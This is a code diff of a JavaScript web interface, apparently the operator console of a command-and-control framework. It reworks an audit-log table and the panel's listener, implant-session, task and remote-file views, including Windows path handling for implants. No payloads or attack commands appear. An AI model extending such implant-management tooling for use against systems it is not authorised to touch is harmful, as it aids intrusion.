if (!listEl) return; if (!listEl) return;
const esc = typeof escapeHtml === 'function' ? escapeHtml : function (s) { return String(s || ''); }; const esc = typeof escapeHtml === 'function' ? escapeHtml : function (s) { return String(s || ''); };
if (!logs.length) { if (!logs.length) {
listEl.innerHTML = '<div class="c2-empty">' + esc(auditT('settingsAudit.empty', null, '暂无审计记录')) + '</div>'; listEl.innerHTML = '<div class="audit-log-empty">' + esc(auditT('settingsAudit.empty', null, '暂无审计记录')) + '</div>';
return; return;
} }
listEl.innerHTML = logs.map(function (log) { const dash = '<span class="audit-log-cell-muted">—</span>';
const lvl = log.result === 'failure' ? 'warn' : (log.level || 'info'); const head = (
'<div class="audit-log-table-wrap">' +
'<table class="audit-log-table">' +
'<thead><tr>' +
'<th data-i18n="settingsAudit.colTime">时间</th>' +
'<th data-i18n="settingsAudit.colMessage">说明</th>' +
'<th data-i18n="settingsAudit.colCategory">类别</th>' +
'<th data-i18n="settingsAudit.colAction">操作</th>' +
'<th data-i18n="settingsAudit.colResult">结果</th>' +
'<th data-i18n="settingsAudit.colIp">IP</th>' +
'<th data-i18n="settingsAudit.colResource">资源 ID</th>' +
'</tr></thead><tbody>'
);
const rows = logs.map(function (log) {
const catLabel = esc(auditCategoryLabel(log.category || '')); const catLabel = esc(auditCategoryLabel(log.category || ''));
const actionLabel = esc(auditActionLabel(log.action || '')); const actionLabel = esc(auditActionLabel(log.action || ''));
const msg = esc(log.message || ''); const msg = esc(auditMessageLabel(log));
const ip = esc(log.clientIp || ''); const ip = esc(log.clientIp || '');
const when = esc(formatAuditTime(log.createdAt)); const when = esc(formatAuditTime(log.createdAt));
const res = esc(log.result || ''); const res = esc(auditResultLabel(log.result || ''));
const rid = log.resourceId || ''; const rid = log.resourceId ? esc(log.resourceId) : '';
const meta = rid ? (' · ' + esc(rid)) : '';
const eid = esc(log.id || ''); const eid = esc(log.id || '');
const resultCls = auditResultTagClass(log.result || '');
const rowClick = 'onclick="showAuditLogDetail(\'' + eid + '\')" ' +
'onkeydown="if(event.key===\'Enter\'||event.key===\' \'){event.preventDefault();showAuditLogDetail(\'' + eid + '\')}"';
return ( return (
'<div class="c2-event-item audit-log-item" role="button" tabindex="0" ' + '<tr class="audit-log-row" role="button" tabindex="0" ' + rowClick + '>' +
'onclick="showAuditLogDetail(\'' + eid + '\')" ' + '<td class="audit-log-col-time">' + when + '</td>' +
'onkeydown="if(event.key===\'Enter\'||event.key===\' \'){event.preventDefault();showAuditLogDetail(\'' + eid + '\')}">' + '<td class="audit-log-col-msg" title="' + msg + '">' + (msg || dash) + '</td>' +
'<div class="c2-event-level ' + esc(lvl) + '"></div>' + '<td>' + (catLabel ? '<span class="audit-tag audit-tag--cat">' + catLabel + '</span>' : dash) + '</td>' +
'<div class="c2-event-content">' + '<td>' + (actionLabel ? '<span class="audit-tag audit-tag--act">' + actionLabel + '</span>' : dash) + '</td>' +
'<div class="c2-event-message">' + msg + '</div>' + '<td>' + (res ? '<span class="audit-tag ' + resultCls + '">' + res + '</span>' : dash) + '</td>' +
'<div class="c2-event-meta">' + when + ' · ' + catLabel + '/' + actionLabel + ' · ' + res + meta + '<td class="audit-log-col-ip">' + (ip || dash) + '</td>' +
(ip ? ' · IP ' + ip : '') + '<td class="audit-log-col-resource" title="' + rid + '">' + (rid || dash) + '</td>' +
'</div></div></div>' '</tr>'
); );
}).join(''); }).join('');
listEl.innerHTML = head + rows + '</tbody></table></div>';
if (typeof applyTranslations === 'function') { if (typeof applyTranslations === 'function') {
applyTranslations(listEl); applyTranslations(listEl);
} }
@@ -326,17 +417,58 @@ function resetAuditLogFilters() {
const act = document.getElementById('audit-filter-action'); const act = document.getElementById('audit-filter-action');
const res = document.getElementById('audit-filter-result'); const res = document.getElementById('audit-filter-result');
const q = document.getElementById('audit-filter-q'); const q = document.getElementById('audit-filter-q');
const since = document.getElementById('audit-filter-since');
const until = document.getElementById('audit-filter-until');
if (cat) cat.value = ''; if (cat) cat.value = '';
if (res) res.value = ''; if (res) res.value = '';
if (q) q.value = ''; if (q) q.value = '';
if (since) since.value = ''; if (typeof window.AuditDatetimePicker !== 'undefined' && typeof window.AuditDatetimePicker.clearAll === 'function') {
if (until) until.value = ''; window.AuditDatetimePicker.clearAll();
}
rebuildAuditActionSelect(); rebuildAuditActionSelect();
syncAuditCustomSelect('audit-filter-category');
syncAuditCustomSelect('audit-filter-result');
filterAuditLogs(); filterAuditLogs();
} }
function applyAuditTimePreset(preset) {
if (typeof window.AuditDatetimePicker === 'undefined') return;
const now = new Date();
let since = new Date(now.getTime());
let until = new Date(now.getTime());
switch (preset) {
case '15m':
since = new Date(now.getTime() - 15 * 60 * 1000);
break;
case '1h':
since = new Date(now.getTime() - 60 * 60 * 1000);
break;
case '24h':
since = new Date(now.getTime() - 24 * 60 * 60 * 1000);
break;
case '7d':
since = new Date(now.getTime() - 7 * 24 * 60 * 60 * 1000);
break;
case 'today':
since = new Date(now.getFullYear(), now.getMonth(), now.getDate(), 0, 0, 0, 0);
break;
default:
return;
}
window.AuditDatetimePicker.setValue('audit-filter-since', since);
window.AuditDatetimePicker.setValue('audit-filter-until', until);
filterAuditLogs();
}
function initAuditTimePresets() {
const wrap = document.getElementById('audit-time-presets');
if (!wrap || wrap.dataset.bound === '1') return;
wrap.dataset.bound = '1';
wrap.addEventListener('click', function (ev) {
const btn = ev.target.closest('[data-preset]');
if (!btn) return;
applyAuditTimePreset(btn.getAttribute('data-preset'));
});
}
/** 资源已被删除/移除的审计操作,不再提供「打开关联资源」 */ /** 资源已被删除/移除的审计操作,不再提供「打开关联资源」 */
const AUDIT_ACTIONS_RESOURCE_REMOVED = { const AUDIT_ACTIONS_RESOURCE_REMOVED = {
delete: true, delete: true,
@@ -533,56 +665,61 @@ async function exportAuditLogsCsv() {
} }
function closeAuditDetailModal() { function closeAuditDetailModal() {
closeAppModal('audit-detail-modal');
const el = document.getElementById('audit-detail-modal'); const el = document.getElementById('audit-detail-modal');
if (el) el.remove(); if (el) el.remove();
syncAppModalBodyLock();
} }
async function showAuditLogDetail(id) { async function showAuditLogDetail(id) {
if (!id || typeof apiFetch !== 'function') return; if (!id || typeof apiFetch !== 'function') return;
const esc = typeof escapeHtml === 'function' ? escapeHtml : function (s) { return String(s || ''); }; const esc = typeof escapeHtml === 'function' ? escapeHtml : function (s) { return String(s || ''); };
try { try {
closeAuditDetailModal();
const overlay = document.createElement('div');
overlay.id = 'audit-detail-modal';
overlay.className = 'modal';
document.body.appendChild(overlay);
openAppModal(overlay, { focus: false });
const r = await apiFetch('/api/audit/logs/' + encodeURIComponent(id)); const r = await apiFetch('/api/audit/logs/' + encodeURIComponent(id));
if (!r.ok) throw new Error('not found'); if (!r.ok) throw new Error('not found');
const data = await r.json(); const data = await r.json();
const log = data.log || {}; const log = data.log || {};
const detail = log.detail ? JSON.stringify(log.detail, null, 2) : ''; const detail = log.detail ? JSON.stringify(log.detail, null, 2) : '';
closeAuditDetailModal();
const overlay = document.createElement('div');
overlay.id = 'audit-detail-modal';
overlay.className = 'modal';
overlay.style.display = 'block';
const catAction = esc(auditCategoryLabel(log.category || '')) + ' / ' + esc(auditActionLabel(log.action || '')); const catAction = esc(auditCategoryLabel(log.category || '')) + ' / ' + esc(auditActionLabel(log.action || ''));
overlay.innerHTML = deferModalContent(function () {
'<div class="modal-content" style="max-width: 720px;">' + overlay.innerHTML =
'<div class="modal-header">' + '<div class="modal-content" style="max-width: 720px;">' +
'<h2>' + esc(auditT('settingsAudit.detailTitle', null, '审计详情')) + '</h2>' + '<div class="modal-header">' +
'<span class="modal-close" onclick="closeAuditDetailModal()">&times;</span>' + '<h2>' + esc(auditT('settingsAudit.detailTitle', null, '审计详情')) + '</h2>' +
'</div>' + '<span class="modal-close" onclick="closeAuditDetailModal()">&times;</span>' +
'<div class="modal-body audit-detail-body">' + '</div>' +
'<p><strong>' + esc(auditT('settingsAudit.detailTime', null, '时间')) + ':</strong> ' + esc(formatAuditTime(log.createdAt)) + '</p>' + '<div class="modal-body audit-detail-body">' +
'<p><strong>' + esc(auditT('settingsAudit.detailCategory', null, '类别')) + ':</strong> ' + catAction + '</p>' + '<p><strong>' + esc(auditT('settingsAudit.detailTime', null, '时间')) + ':</strong> ' + esc(formatAuditTime(log.createdAt)) + '</p>' +
'<p><strong>' + esc(auditT('settingsAudit.detailResult', null, '结果')) + ':</strong> ' + esc(log.result || '') + '</p>' + '<p><strong>' + esc(auditT('settingsAudit.detailCategory', null, '类别')) + ':</strong> ' + catAction + '</p>' +
'<p><strong>' + esc(auditT('settingsAudit.detailMessage', null, '说明')) + ':</strong> ' + esc(log.message || '') + '</p>' + '<p><strong>' + esc(auditT('settingsAudit.detailResult', null, '结果')) + ':</strong> ' + esc(auditResultLabel(log.result || '')) + '</p>' +
(log.clientIp ? '<p><strong>IP:</strong> ' + esc(log.clientIp) + '</p>' : '') + '<p><strong>' + esc(auditT('settingsAudit.detailMessage', null, '说明')) + ':</strong> ' + esc(auditMessageLabel(log)) + '</p>' +
(log.sessionHint ? '<p><strong>' + esc(auditT('settingsAudit.detailSession', null, '会话')) + ':</strong> ' + esc(log.sessionHint) + '</p>' : '') + (log.clientIp ? '<p><strong>IP:</strong> ' + esc(log.clientIp) + '</p>' : '') +
(log.userAgent ? '<p><strong>UA:</strong> ' + esc(log.userAgent) + '</p>' : '') + (log.sessionHint ? '<p><strong>' + esc(auditT('settingsAudit.detailSession', null, '会话')) + ':</strong> ' + esc(log.sessionHint) + '</p>' : '') +
auditResourceMeta(log) + (log.userAgent ? '<p><strong>UA:</strong> ' + esc(log.userAgent) + '</p>' : '') +
(detail ? '<pre class="audit-detail-pre">' + esc(detail) + '</pre>' : '') + auditResourceMeta(log) +
'</div>' + (detail ? '<pre class="audit-detail-pre">' + esc(detail) + '</pre>' : '') +
'<div class="modal-footer"><button type="button" class="btn-secondary" onclick="closeAuditDetailModal()">' + '</div>' +
esc(auditT('common.close', null, '关闭')) + '</button></div>' + '<div class="modal-footer"><button type="button" class="btn-secondary" onclick="closeAuditDetailModal()">' +
'</div>'; esc(auditT('common.close', null, '关闭')) + '</button></div>' +
document.body.appendChild(overlay); '</div>';
const chatBtn = overlay.querySelector('.audit-open-chat-btn'); const chatBtn = overlay.querySelector('.audit-open-chat-btn');
if (chatBtn) { if (chatBtn) {
chatBtn.addEventListener('click', function () { chatBtn.addEventListener('click', function () {
auditOpenConversationChat(chatBtn.getAttribute('data-conversation-id')); auditOpenConversationChat(chatBtn.getAttribute('data-conversation-id'));
});
}
overlay.addEventListener('click', function (ev) {
if (ev.target === overlay) closeAuditDetailModal();
}); });
}
overlay.addEventListener('click', function (ev) {
if (ev.target === overlay) closeAuditDetailModal();
}); });
} catch (e) { } catch (e) {
closeAuditDetailModal();
if (typeof showToast === 'function') { if (typeof showToast === 'function') {
showToast(e.message || String(e), 'error'); showToast(e.message || String(e), 'error');
} }
@@ -592,7 +729,171 @@ async function showAuditLogDetail(id) {
function initAuditLogsSection() { function initAuditLogsSection() {
if (!document.getElementById('audit-log-list')) return; if (!document.getElementById('audit-log-list')) return;
initAuditPageSizeFromStorage(); initAuditPageSizeFromStorage();
initAuditFilterSelects();
rebuildAuditActionSelect(); rebuildAuditActionSelect();
loadAuditMeta(); if (typeof window.AuditDatetimePicker !== 'undefined' && typeof window.AuditDatetimePicker.init === 'function') {
window.AuditDatetimePicker.init();
}
initAuditTimePresets();
updateAuditTimezoneHint();
loadAuditLogs(1); loadAuditLogs(1);
} }
function refreshAuditFilterI18n() {
const section = document.getElementById('settings-section-audit');
if (section && typeof applyTranslations === 'function') {
applyTranslations(section);
}
rebuildAuditActionSelect();
syncAuditCustomSelect('audit-filter-category');
syncAuditCustomSelect('audit-filter-action');
syncAuditCustomSelect('audit-filter-result');
updateAuditTimezoneHint();
}
function refreshAuditLogsI18n() {
if (!document.getElementById('audit-log-list')) return;
refreshAuditFilterI18n();
if (auditLogsCache.length) {
renderAuditLogs(auditLogsCache);
renderAuditLogsPagination();
}
}
document.addEventListener('languagechange', function () {
try {
refreshAuditLogsI18n();
} catch (e) {
console.warn('languagechange audit refresh failed', e);
}
});
var auditCustomSelectMap = {};
var auditFilterSelectsDocListener = false;
function closeAllAuditCustomSelects() {
Object.keys(auditCustomSelectMap).forEach(function (id) {
auditCustomSelectMap[id].wrapper.classList.remove('open');
});
}
function syncAuditCustomSelect(selectId) {
var reg = auditCustomSelectMap[selectId];
if (!reg) return;
var select = reg.select;
var dropdown = reg.dropdown;
var trigger = reg.trigger;
var wrapper = reg.wrapper;
var valueSpan = trigger.querySelector('.audit-custom-select-value');
dropdown.innerHTML = '';
Array.prototype.forEach.call(select.options, function (opt) {
var item = document.createElement('div');
item.className = 'audit-custom-select-option';
item.setAttribute('role', 'option');
item.setAttribute('data-value', opt.value);
if (opt.value === select.value) {
item.classList.add('is-selected');
item.setAttribute('aria-selected', 'true');
}
var check = document.createElement('span');
check.className = 'audit-custom-select-check';
check.setAttribute('aria-hidden', 'true');
check.textContent = '✓';
var label = document.createElement('span');
label.className = 'audit-custom-select-label';
label.textContent = opt.textContent;
item.appendChild(check);
item.appendChild(label);
dropdown.appendChild(item);
});
var selectedOpt = select.options[select.selectedIndex];
if (valueSpan) {
valueSpan.textContent = selectedOpt ? selectedOpt.textContent : '';
}
trigger.disabled = !!select.disabled;
wrapper.classList.toggle('is-disabled', !!select.disabled);
}
function enhanceAuditFilterSelect(selectId) {
var select = document.getElementById(selectId);
if (!select) return;
if (select.dataset.auditCustom === '1') {
syncAuditCustomSelect(selectId);
return;
}
select.dataset.auditCustom = '1';
select.classList.add('audit-native-select');
select.tabIndex = -1;
select.setAttribute('aria-hidden', 'true');
var wrapper = document.createElement('div');
wrapper.className = 'audit-custom-select';
var trigger = document.createElement('button');
trigger.type = 'button';
trigger.className = 'audit-custom-select-trigger';
trigger.setAttribute('aria-haspopup', 'listbox');
var valueSpan = document.createElement('span');
valueSpan.className = 'audit-custom-select-value';
trigger.appendChild(valueSpan);
var caret = document.createElement('span');
caret.className = 'audit-custom-select-caret';
caret.setAttribute('aria-hidden', 'true');
caret.textContent = '▾';
trigger.appendChild(caret);
var dropdown = document.createElement('div');
dropdown.className = 'audit-custom-select-dropdown';
dropdown.setAttribute('role', 'listbox');
var parent = select.parentNode;
parent.insertBefore(wrapper, select);
wrapper.appendChild(trigger);
wrapper.appendChild(dropdown);
wrapper.appendChild(select);
auditCustomSelectMap[selectId] = {
wrapper: wrapper,
trigger: trigger,
dropdown: dropdown,
select: select
};
trigger.addEventListener('click', function (e) {
e.stopPropagation();
if (select.disabled) return;
var open = wrapper.classList.contains('open');
closeAllAuditCustomSelects();
if (!open) wrapper.classList.add('open');
});
dropdown.addEventListener('click', function (e) {
var opt = e.target.closest('.audit-custom-select-option');
if (!opt) return;
var val = opt.getAttribute('data-value');
if (val === null) val = '';
if (select.value !== val) {
select.value = val;
select.dispatchEvent(new Event('change', { bubbles: true }));
}
wrapper.classList.remove('open');
syncAuditCustomSelect(selectId);
});
syncAuditCustomSelect(selectId);
}
function initAuditFilterSelects() {
if (!document.getElementById('audit-filter-category')) return;
if (!auditFilterSelectsDocListener) {
document.addEventListener('click', function () {
closeAllAuditCustomSelects();
});
auditFilterSelectsDocListener = true;
}
enhanceAuditFilterSelect('audit-filter-category');
enhanceAuditFilterSelect('audit-filter-action');
enhanceAuditFilterSelect('audit-filter-result');
}
+3 -5
View File
@@ -72,7 +72,7 @@ function showLoginOverlay(message = '') {
if (!overlay) { if (!overlay) {
return; return;
} }
overlay.style.display = 'flex'; openAppModal('login-overlay', { focus: false });
if (errorBox) { if (errorBox) {
if (message) { if (message) {
errorBox.textContent = message; errorBox.textContent = message;
@@ -82,7 +82,7 @@ function showLoginOverlay(message = '') {
errorBox.style.display = 'none'; errorBox.style.display = 'none';
} }
} }
setTimeout(() => { setTimeout(function () {
if (passwordInput) { if (passwordInput) {
passwordInput.focus(); passwordInput.focus();
} }
@@ -93,9 +93,7 @@ function hideLoginOverlay() {
const overlay = document.getElementById('login-overlay'); const overlay = document.getElementById('login-overlay');
const errorBox = document.getElementById('login-error'); const errorBox = document.getElementById('login-error');
const passwordInput = document.getElementById('login-password'); const passwordInput = document.getElementById('login-password');
if (overlay) { closeAppModal('login-overlay');
overlay.style.display = 'none';
}
if (errorBox) { if (errorBox) {
errorBox.textContent = ''; errorBox.textContent = '';
errorBox.style.display = 'none'; errorBox.style.display = 'none';
+29 -33
View File
@@ -321,7 +321,6 @@
} }
switch(pageId) { switch(pageId) {
case 'c2':
case 'c2-listeners': case 'c2-listeners':
C2.loadListeners(); C2.loadListeners();
break; break;
@@ -370,7 +369,6 @@
C2.profiles = pdata.profiles; C2.profiles = pdata.profiles;
} }
C2.renderListeners(); C2.renderListeners();
C2.updateDashboardStats();
}); });
}; };
@@ -480,7 +478,7 @@
const content = document.getElementById('c2-modal-content'); const content = document.getElementById('c2-modal-content');
if (!content || !modal) return; if (!content || !modal) return;
modal.style.display = 'flex'; openAppModal(modal);
content.innerHTML = ` content.innerHTML = `
<div class="c2-modal-header"> <div class="c2-modal-header">
<h3>${escapeHtml(c2t('c2.listeners.modalCreateTitle'))}</h3> <h3>${escapeHtml(c2t('c2.listeners.modalCreateTitle'))}</h3>
@@ -637,7 +635,7 @@
const content = document.getElementById('c2-modal-content'); const content = document.getElementById('c2-modal-content');
if (!content || !modal) return; if (!content || !modal) return;
modal.style.display = 'flex'; openAppModal(modal);
content.innerHTML = ` content.innerHTML = `
<div class="c2-modal-header"> <div class="c2-modal-header">
<h3>${escapeHtml(c2t('c2.listeners.editTitle'))}</h3> <h3>${escapeHtml(c2t('c2.listeners.editTitle'))}</h3>
@@ -736,7 +734,6 @@
return apiRequest('GET', `${API_BASE}/sessions`).then(data => { return apiRequest('GET', `${API_BASE}/sessions`).then(data => {
C2.sessions = data.sessions || []; C2.sessions = data.sessions || [];
C2.renderSessions(); C2.renderSessions();
C2.updateDashboardStats();
}); });
}; };
@@ -1095,7 +1092,7 @@
cursorBlink: true, cursorBlink: true,
cursorStyle: 'block', cursorStyle: 'block',
fontSize: 14, fontSize: 14,
fontFamily: 'Menlo, Monaco, "Courier New", monospace', fontFamily: 'Menlo, Monaco, "Courier New", "PingFang SC", "Microsoft YaHei", monospace',
lineHeight: 1.3, lineHeight: 1.3,
scrollback: 5000, scrollback: 5000,
theme: { theme: {
@@ -1480,10 +1477,32 @@
return '/' + stack.join('/'); return '/' + stack.join('/');
}; };
/** 将 /d:/path/file 转为 Windows 远程路径 d:\path\file */
C2.toWindowsRemotePath = function(path) {
var p = String(path || '').trim().replace(/\\/g, '/');
if (/^\/[a-zA-Z]:\//.test(p)) {
p = p.slice(1);
}
return p.replace(/\//g, '\\');
};
C2.sessionIsWindows = function(session) {
if (!session) return false;
return String(session.os || '').toLowerCase().indexOf('windows') >= 0;
};
C2.resolveRemotePath = function(browsePath, filename) { C2.resolveRemotePath = function(browsePath, filename) {
var joined = C2.joinFilePath(browsePath || '.', filename); var joined = C2.joinFilePath(browsePath || '.', filename);
if (!C2.implantPwd) return joined; if (!C2.implantPwd) return joined;
return C2.resolvePathAgainstPwd(C2.implantPwd, joined); var resolved = C2.resolvePathAgainstPwd(C2.implantPwd, joined);
var session = null;
if (C2.selectedSessionId && C2.sessions) {
session = C2.sessions.find(function(s) { return s.id === C2.selectedSessionId; });
}
if (C2.sessionIsWindows(session)) {
return C2.toWindowsRemotePath(resolved);
}
return resolved;
}; };
C2.updateFileBreadcrumb = function(browsePath) { C2.updateFileBreadcrumb = function(browsePath) {
@@ -2037,7 +2056,6 @@
C2.renderTasks(); C2.renderTasks();
C2.renderTasksPagination(); C2.renderTasksPagination();
C2.syncTasksToolbar(); C2.syncTasksToolbar();
C2.updateDashboardStats();
}).catch(err => { }).catch(err => {
showToast(err.message || String(err), 'error'); showToast(err.message || String(err), 'error');
}); });
@@ -2163,7 +2181,6 @@
const tasks = data.tasks || []; const tasks = data.tasks || [];
if (typeof data.pending_queued_count === 'number') { if (typeof data.pending_queued_count === 'number') {
C2.tasksPendingQueuedCount = data.pending_queued_count; C2.tasksPendingQueuedCount = data.pending_queued_count;
C2.updateDashboardStats();
} }
if (!container) return; if (!container) return;
@@ -2359,7 +2376,7 @@
<button class="btn-secondary" onclick="C2.closeModal()">${escapeHtml(c2t('common.close'))}</button> <button class="btn-secondary" onclick="C2.closeModal()">${escapeHtml(c2t('common.close'))}</button>
</div> </div>
`; `;
modal.style.display = 'flex'; openAppModal(modal);
}; };
const local = C2.tasks.find(x => x.id === id); const local = C2.tasks.find(x => x.id === id);
@@ -2819,7 +2836,6 @@
showToast(`[${event.category}] ${event.message}`, event.level === 'critical' ? 'error' : 'info'); showToast(`[${event.category}] ${event.message}`, event.level === 'critical' ? 'error' : 'info');
} }
C2.updateDashboardStats();
}; };
// ============================================================================ // ============================================================================
@@ -2904,7 +2920,7 @@
<button class="btn-primary" onclick="C2.createProfile()">${escapeHtml(c2t('c2.profiles.submitCreate'))}</button> <button class="btn-primary" onclick="C2.createProfile()">${escapeHtml(c2t('c2.profiles.submitCreate'))}</button>
</div> </div>
`; `;
modal.style.display = 'flex'; openAppModal(modal);
}; };
C2.createProfile = function() { C2.createProfile = function() {
@@ -2953,26 +2969,6 @@
}); });
}; };
// ============================================================================
// 仪表盘
// ============================================================================
C2.updateDashboardStats = function() {
const runningListeners = C2.listeners.filter(l => l.status === 'running').length;
const activeSessions = C2.sessions.filter(s => s.status === 'active').length;
const pendingTasks = typeof C2.tasksPendingQueuedCount === 'number'
? C2.tasksPendingQueuedCount
: C2.tasks.filter(t => t.status === 'queued' || t.status === 'pending').length;
const elListeners = document.getElementById('c2-stat-listeners');
const elSessions = document.getElementById('c2-stat-sessions');
const elPending = document.getElementById('c2-stat-pending');
if (elListeners) elListeners.textContent = runningListeners;
if (elSessions) elSessions.textContent = activeSessions;
if (elPending) elPending.textContent = pendingTasks;
};
// ============================================================================ // ============================================================================
// 模态框 // 模态框
// ============================================================================ // ============================================================================
@@ -2985,10 +2981,10 @@
C2.closeModal = function() { C2.closeModal = function() {
const modal = document.getElementById('c2-modal'); const modal = document.getElementById('c2-modal');
if (modal) { if (modal) {
modal.style.display = 'none';
const modalBox = modal.querySelector('.c2-modal'); const modalBox = modal.querySelector('.c2-modal');
if (modalBox) modalBox.classList.remove('c2-modal--wide'); if (modalBox) modalBox.classList.remove('c2-modal--wide');
} }
closeAppModal('c2-modal');
}; };
// ============================================================================ // ============================================================================

Some files were not shown because too many files have changed in this diff Show More